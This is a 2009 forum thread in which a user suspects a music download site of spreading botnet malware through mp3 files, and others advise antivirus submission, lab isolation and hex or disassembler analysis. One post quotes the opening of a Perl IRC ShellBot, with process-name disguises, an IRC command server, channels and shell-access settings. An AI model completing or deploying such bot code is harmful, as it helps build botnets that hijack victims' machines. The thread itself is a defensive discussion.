.

THe website is Evil but what to do??

<<

rok

Newbie
Newbie

Posts: 39

Joined: Sun Apr 27, 2008 2:18 am

Post Tue Jan 06, 2009 6:52 am

THe website is Evil but what to do??

Hello guys,

how are you guys?Ok lets come to the point.OK,I have a situation.I have identified a website.That's a song download website.And They are spreading one virus with those Music files.The site has almost 1200000 members.So they have easily created huge Botnet.And they are still infecting and spreading the virus and making a huge Botnet.Can anyone tell me what can I do here from this situation?I need to exploit the Botnet or the group and need to report it to the Police authority,so what forensic tests I can do.Please suggest and please anyone who wants help me can Ping me.It would be very Nice of ethicalhacker forum.I hope its ethical what I said here.Please help me.And I need it do it first because they might start attacking any point of time.
<<

jimbob

Post Tue Jan 06, 2009 7:00 am

Re: THe website is Evil but what to do??

Hi there Rok,
One thing you can do if you have a sample of the malware in question you should submit it to the AV software companies. That way it will be added to their virus signatures so it can be detected.

You have to be certain that it is malware before making any accusations. Many such websites have a usage policy which expressly allows them to install adware/spyware. If a user signs up and accepts the agreement then the activity may be legit. There are lots of resources out there and on the forum for malware analysis, try reading up on them and attempt an analysis if you like. Be careful though, exercise caution and try to keep your lab as isolated as possible.

Regards,
Jim
<<

rok

Newbie
Newbie

Posts: 39

Joined: Sun Apr 27, 2008 2:18 am

Post Thu Jan 08, 2009 6:09 am

Re: THe website is Evil but what to do??

Hello Jim,
Thanks for your reply.

Can you give me much more information.I have got here.mp3 files.I want to read the entire code of that .mp3 file.Can you tell me anyways possible and simple enough for that.I assume the attackers may have injected some good amount of coding to that file so that it can join over any IRCD and channel and can work as per the Botmaster.I want to know the codings.It may be encrypted but at this point of time I only have one way to go and that is to look at the codings.Their must be something similar to this....


#!/usr/bin/perl

my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd",&quot;[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid",&quot;/usr/sbin/cron","[bash]&quot;);
my $processo = $ps[rand scalar @ps];

$servidor='irc.lol.com' unless $servidor;
my $porta='6667';
my @canais=("#CANAL");
my @adms=("ADMIN");

# Anti Flood ( 6/3 Recomendado )
my $linas_max=10;
my $sleep=3;

my $nick = getnick();
my $ircname = getident2();
my $realname = "windows nt 5.1 build 2600";
#chop (my $realname = `uname -n`);

my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = "!all";
my $estatisticas = 0;
my $pacotes = 1;
####################################


May be some thing like this...Please help how can I look at the codes of that .mp3 file.
<<

NickFnord

User avatar

Full Member
Full Member

Posts: 117

Joined: Fri Sep 05, 2008 5:25 am

Post Thu Jan 08, 2009 6:59 am

Re: THe website is Evil but what to do??

that's a massive assumption you're making there....

as far as I'm aware - exploits using mp3's are similar to the ones using image files that you asked about in July last year. 

as an mp3 is just a file format (http://en.wikipedia.org/wiki/Mp3#File_structure / http://www.mpgedit.org/mpgedit/mpeg_for ... ormat.html) the mp3 would have to exploit a specific buffer overflow or some other vulnerability in order to start executing.  I remember something like this happening in winamp a while back, but havn't heard anything recently about this being possible in any popular mp3 players.

you can open the mp3 in a hex editor to see what's in it.  if you think it contains exploit code then you can look at it in a dissassembler or do any number of system level reversing tricks in a virtual machine. 

Return to Malware

Who is online

Users browsing this forum: No registered users and 0 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software